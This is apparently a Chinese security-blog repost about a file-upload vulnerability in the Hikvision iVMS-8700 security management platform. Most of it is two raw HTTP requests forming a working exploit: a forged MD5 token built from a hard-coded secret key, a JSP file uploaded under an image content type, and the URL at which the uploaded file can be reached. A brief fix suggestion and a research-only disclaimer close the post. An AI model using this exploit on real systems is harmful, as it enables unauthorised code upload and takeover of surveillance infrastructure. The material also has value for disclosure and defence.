海康威视综合安防系统 iVMS-8700
POST /eps/api/resourceOperations/upload HTTP/1.1Host: ip:portUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateReferer: http://ip:portConnection: closeCookie: ISMS_8700_Sessionname=7634604FBE659A8532E666FE4AA41BE9Upgrade-Insecure-Requests: 1Content-Length: 62service=http%3A%2F%2Fip:port%3Ax%2Fhome%2Findex.action
POST /eps/api/resourceOperations/upload?token=构造的token值 HTTP/1.1Host: your-ipUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Connection: closeCookie: ISMS_8700_Sessionname=A29E70BEA1FDA82E2CF0805C3A389988Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryGEJwiloiPoUpgrade-Insecure-Requests: 1Content-Length: 174------WebKitFormBoundaryGEJwiloiPoContent-Disposition: form-data; name="fileUploader";filename="1.jsp"Content-Type: image/jpegtest------WebKitFormBoundaryGEJwiloiPo
其中token的值为
MD5(http://ip:port/eps/api/resourceOperations/uploadsecretKeyIbuilding)的值
访问上传文件的路径为http://ip:port/eps/upload/resourceUuid.jsp
修复建议:关闭互联网暴露面访问的权限,文件上传模块做好权限强认证。
参考链接:
https://blog.csdn.net/qq_50854662/article/details/131481634
原文始发于微信公众号(玄知安全实验室):海康iVMS综合安防存在文件上传漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论